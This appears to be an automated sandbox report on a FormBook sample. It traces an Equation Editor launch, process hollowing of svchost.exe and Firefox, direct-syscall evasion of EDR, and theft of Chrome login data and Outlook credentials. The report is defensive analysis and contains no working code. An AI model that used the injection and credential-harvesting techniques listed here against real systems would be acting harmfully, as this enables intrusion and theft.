Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D09D5 SetUnhandledExceptionFilter,	5_2_012D09D5
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012E2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_012E2622
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_012D083F
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_012D0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_012D0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQueryInformationProcess: Direct from: 0x774CFAFA	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtCreateUserProcess: Direct from: 0x774D093E	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtCreateKey: Direct from: 0x774CFB62	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQuerySystemInformation: Direct from: 0x774D20DE	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQueryDirectoryFile: Direct from: 0x774CFDBA	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtWriteVirtualMemory: Direct from: 0x774D213E	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtCreateFile: Direct from: 0x774D00D6	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetTimer: Direct from: 0x774D021A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtOpenFile: Direct from: 0x774CFD86	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtOpenKeyEx: Direct from: 0x774CFA4A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtAllocateVirtualMemory: Direct from: 0x774CFAE2	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtResumeThread: Direct from: 0x774D008D	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtOpenKeyEx: Direct from: 0x774D103A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtUnmapViewOfSection: Direct from: 0x774CFCA2	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtDelayExecution: Direct from: 0x774CFDA1	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetInformationProcess: Direct from: 0x774CFB4A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetInformationThread: Direct from: 0x774CF9CE	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtReadFile: Direct from: 0x774CF915	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtMapViewOfSection: Direct from: 0x774CFC72	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtCreateThreadEx: Direct from: 0x774D08C6	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtDeviceIoControlFile: Direct from: 0x774CF931	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtRequestWaitReplyPort: Direct from: 0x753C6BCE	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQueryValueKey: Direct from: 0x774CFACA	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtOpenSection: Direct from: 0x774CFDEA	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtProtectVirtualMemory: Direct from: 0x774D005A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetInformationThread: Direct from: 0x774CFF12	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtWriteVirtualMemory: Direct from: 0x774CFE36	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtRequestWaitReplyPort: Direct from: 0x756F8D92	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQueryVolumeInformationFile: Direct from: 0x774CFFAE	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtNotifyChangeKey: Direct from: 0x774D0F92	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQueryAttributesFile: Direct from: 0x774CFE7E	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtReadVirtualMemory: Direct from: 0x774CFEB2	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetTimer: Direct from: 0x774E98D5	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtSetInformationFile: Direct from: 0x774CFC5A	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	NtQuerySystemInformation: Direct from: 0x774CFDD2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\finger.exe

Thread APC queued: target process: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\finger.exe

Section unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: F20000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

5_2_01311201

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012F2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_012F2BA5

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0131B226 SendInput,keybd_event,

5_2_0131B226

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0131E355 mouse_event,

5_2_0131E355

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\fredchungel99962.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\fredchungel99962.exe"	Jump to behavior
Source: C:\Program Files (x86)\wvNrnkAyIyeyoBWaSlNQpiHcCFaHgWpmNFJShDPlRvsWEKLHJhvseVKGftp\CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe	Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

5_2_01310B62

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_01311663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

5_2_01311663

Source: fredchungel99962.exe, 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmp, fredchungel99962.exe.2.dr, BE[1].exe.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841372520.0000000000A20000.00000002.00000001.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000000.362337309.0000000000A20000.00000002.00000001.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841885781.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: fredchungel99962.exe, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841372520.0000000000A20000.00000002.00000001.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000000.362337309.0000000000A20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000002.841372520.0000000000A20000.00000002.00000001.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 00000007.00000000.362337309.0000000000A20000.00000002.00000001.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841885781.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012D0698 cpuid

5_2_012D0698

Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xjn0f.zip VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012E333F GetSystemTimeAsFileTime,

5_2_012E333F

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0130D27A GetUserNameW,

5_2_0130D27A

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012EB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

5_2_012EB952

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_012B42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_012B42DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Source: fredchungel99962.exe	Binary or memory string: WIN_81
Source: fredchungel99962.exe	Binary or memory string: WIN_XP
Source: BE[1].exe.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: fredchungel99962.exe	Binary or memory string: WIN_XPe
Source: fredchungel99962.exe	Binary or memory string: WIN_VISTA
Source: fredchungel99962.exe	Binary or memory string: WIN_7
Source: fredchungel99962.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.382596136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.382533799.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457614450.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.841509438.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841357530.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841245837.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.383628126.0000000001F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.841406060.0000000003C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.841337285.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

